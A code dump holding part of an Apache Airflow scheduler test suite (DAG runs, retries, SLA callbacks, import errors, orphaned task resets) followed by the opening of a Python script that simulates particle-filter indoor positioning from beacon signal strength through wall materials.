orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = mock.MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1,
**self.default_scheduler_args)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, ti) = ti_tuple
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# now the executor has cleared and it should be allowed the re-queue
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.QUEUED)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id==dag.dag_id,
TI.task_id==dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration,
**self.default_scheduler_args)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
self.assertLess(run_duration - expected_run_duration, 5.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir= dag_directory,
num_runs=1,
**self.default_scheduler_args)
scheduler.run()
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns it's active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
three_minutes_ago = now - datetime.timedelta(minutes=3)
two_hours_and_three_minutes_ago = three_minutes_ago - datetime.timedelta(hours=2)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'no_catchup_test1'
DAG_NAME2 = 'no_catchup_test2'
DAG_NAME3 = 'no_catchup_test3'
DAG_NAME4 = 'no_catchup_test4'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
default_catchup = configuration.getboolean('scheduler', 'catchup_by_default')
# Test configs have catchup by default ON
self.assertEqual(default_catchup, True)
# Correct default?
self.assertEqual(dag1.catchup, True)
dag2 = DAG(DAG_NAME2,
schedule_interval='* * * * *',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag2)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag2)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag2)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag2.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag2.clear()
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 3 minutes, not 6 hours ago
self.assertGreater(dr.execution_date, three_minutes_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = DAG(DAG_NAME3,
schedule_interval='@hourly',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag3)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag3)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag3)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag3.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag3.clear()
dr = None
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last two hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_and_three_minutes_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
# check @once schedule
dag4 = DAG(DAG_NAME4,
schedule_interval='@once',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag4)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag4)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag4)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag4.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag4.clear()
dr = None
dr = scheduler.create_dag_run(dag4)
# We had better get a dag run
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = []
expected_files = []
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['no_dags.py']:
expected_files.append(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER):
detected_files.append(file_path)
self.assertEqual(sorted(detected_files), sorted(expected_files))
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEquals(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEquals(State.SCHEDULED, ti1.state)
self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEquals(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
byMaterialThickness.py
|
from __future__ import division
import numpy as np
import math # for math.ceil
import matplotlib.pyplot as plt
from numpy.linalg import norm
from numpy.random import uniform
from scipy.stats import multivariate_normal # for bivariate gaussian -> brownian motion ( normal with mu x(t-1), and variance sigma )
from filterpy.monte_carlo import systematic_resample, multinomial_resample , residual_resample, stratified_resample
from scipy.optimize import minimize
from scipy.optimize import fmin_tnc
from matplotlib.patches import Ellipse, Rectangle, Circle
import matplotlib.transforms as transforms
from matplotlib import animation
from matplotlib import collections
from numpy.random import seed
from multiprocessing import Process
from collections import deque as col_deque # for the sliding windows
import copy
#from matplotlib.font_manager import FontProperties
import time
from sklearn.cluster import KMeans
from shapely.geometry import LineString
from shapely.geometry import Point
from shapely.geometry import Polygon
#from shapely.geometry.point import Point
import shapely.affinity
import matplotlib.ticker as mticker
from scipy.interpolate import griddata
from scipy.interpolate import interp2d
from matplotlib import rc
import sys
rc('text', usetex=True)
# object of interest , all variables used for single object tracking will be used as a member variable
# and all the function will be used as a class function instead of global functions
if len(sys.argv)!=5:
print "run as 'python <script name> <thickness> <material type> <seed no> <output file name>'"
sys.exit(1)
sizeIncrementRatio=1000/762 # sizeIncrementRatio_small_over_large -> kagida basarken small haritalarin boyutu buyuk oldugundan daha cok resize ediliyor, bunu handle etmeliyiz.
#materials=['concrete']
blockWidth=float(sys.argv[1]) # 0.7 = 70cm for example
materials=[sys.argv[2]]
sensitivityOfResult=0.1
maxSignalError=5
numberOfBlocks=2
#blockWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#blockLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 12
blockLength=2.5
pastCoeff=0.2
totalNumberOfPeople=1
MinWaitingForPerson=0 # min waiting time between each person
MaxWaitingForPerson=20
totalIterNo=6
NumberOfParticles=300
xdims=(0,5) # our office's coordinates
ydims=(0,3)
#xdims=(0,3)
#ydims=(0,2)
movingLimit=1.0
minUsefulSignal=-90
minSignalValue=-100
numberOfReceivers=3
strongSignalDistance=5
#movingTendency=np.array([0.5,0.2])
movingTendency=np.array([0.0,0.0])
prevMotionRepeatProb=0.75
numberOfRooms=0
#roomWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#roomLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 6
roomWidth=2
roomLength=5
# roomPositions = [ [6.75,7] ]
OOIWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /20 * sizeIncrementRatio # beacon representing the person is drawn as circle in the map(ellipse indeed, but looks like a circle due to adjustments)
OOIHeight=OOIWidth
particleWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /400 * sizeIncrementRatio
particleHeight=particleWidth
# these blocking material positions will be added in main function
# make receivers in square shape
receiverWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /30 * sizeIncrementRatio
receiverLength=receiverWidth
receiverPositions=[]
blockPositions=[]
roomPositions=[]
blockMaterials=[]
roomMaterials=[]
WallRoomRatio=0.125# 0/125: rooms have only 1/8 of them as the 2 walls that we intersect(so inner area is 14 wall width totaling 16 wall width area size)
# distance is already calculated for our RSSI before taking material things into account, so no need to think about empty area in the rooms
roomWallWidth=roomWidth * WallRoomRatio # express line witdht in terms of data points instead of axis
# since linewidth expand line width towards inside and outside both in equal amount(so roomWallWidth/2 distance check from rectangle boundary is enouhg for collision check)
#materials = ['aluminum','iron', 'concrete', 'brick', 'glass'] # blockMaterials and roomMaterials elements are chosen from this list
materialColors = {'aluminum':'silver','iron':'black', 'concrete':'gray', 'brick':'red', 'glass':'aqua'} # https://matplotlib.org/users/colors.html
#material_SignalDisturbance_Coefficients={'aluminum':10.0, 'iron':9.0, 'concrete':8.0, 'brick':7.0, 'glass':3.0 } # signal attenuation per 1 meter in terms of dBm
material_SignalDisturbance_Coefficients={'aluminum':20.0, 'iron':18.0, 'concrete':16.0, 'brick':14.0, 'glass':6.0 } # signal attenuation per 1 meter in terms of dBm
smallestFigureSideInInch=6 # smallest side will be 6 inch
TX_Power=0
rssiAtOne=TX_Power-65
fingerPrintingBeaconPositions=np.array( [ [0.25,2.25], [5, 5 ], [12, 8 ], [11.5, 3 ] ] )
#fingerPrintingBeaconPositions=np.array( [ [0,0], [5, 5 ], [12, 8 ], [13.5,13 ] ] )
fingerPrintingSignalStrengthBeaconsToReceivers=np.array([ [ -76, -73, -86, -82 ], [ -84, -81, -67, -72 ], [ -83, -77, -85, -89 ] ]) # 4 Beacon to each of the 3 receivers
InterpolatedMapForReceivers=None
interpolatedSignalStrenghForAllPositions_forEachReceiver={} # make it a dictionary where the key is 2d position
useFingerPrinting=True # use fingerprinting instead of multi-laterate , choose the 1st nearest valued position
safetyOffset = 10**-10
OverallError=0
numberOfNotFounds=0
#predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7], [2.5,0.2], [3.5,0.15] ])
predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7] ])
def main():
global receiverPositions, blockPositions, roomPositions, blockMaterials, roomMaterials, roomWallWidth
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#print "processFunction"
seed(int(sys.argv[3]))
print "seed is: " + sys.argv[3]
receiverPositions=getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers)
blockPositions=getBlockPositionsToInstall(xdims=xdims,ydims=ydims,numberOfBlocks=numberOfBlocks) # install blocks without overlapping
#roomPositions=getRoomPositionsToInstall(xdims=xdims,ydims=ydims,numberOfRooms=numberOfRooms,roomBoundary=roomWallWidth/2)
blockMaterials=np.random.choice(materials, numberOfBlocks)
roomMaterials=np.random.choice(materials, numberOfRooms)
AllProcesses=[]
#for i in range(totalNumberOfPeople):
AllProcesses.append(Process(target=processFunction,args=() ) )
for proc in AllProcesses:
proc.start()
sleepAmount=np.random.uniform(low=MinWaitingForPerson,high=MaxWaitingForPerson)
#print "sleepAmount is: " + str(sleepAmount)
time.sleep(sleepAmount)
def processFunction():
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
macID=generateRandomMACID()
while True:
initialPositionOfThePerson=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(2))
isCollision=False
for blockPosition in blockPositions:
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex, roomPosition in enumerate(roomPositions):
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomWallWidth/2):
isCollision=True
break
if not isCollision:
break
currPerson = OOI(xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson)
iterNo=0
while iterNo < totalIterNo:
animate(iterNo, macID, currPerson, NumberOfParticles,xdims,ydims,maxSignalError,movingLimit,pastCoeff,
minUsefulSignal,minSignalValue,numberOfReceivers,sensitivityOfResult,
strongSignalDistance,movingTendency)
iterNo+=1
def checkIfCoordinateIsInMap(coords,width,height):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
return coords[0]-width/2 >= xmin and coords[0]+width/2 <= xmax and coords[1]-height/2 >= ymin and coords[1]+height/2 <= ymax
class OOI:
def __init__(self,xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson):
# INITIALIZATION STEP, distribute particles on the map
self.particles = create_uniform_particles(xdims,ydims , NumberOfParticles)
self.weights = np.ones(NumberOfParticles) / NumberOfParticles
#beacon_pos = np.array([0.0, 0.0])
#self.beacon_pos = np.array( [(xdims[1]-xdims[0])/4.0,(ydims[1]-ydims[0])/4.0] )
self.beacon_pos=initialPositionOfThePerson
self.prev_walkingNoise=None
self.x_prev = np.zeros((NumberOfParticles, 2)) # prev particles
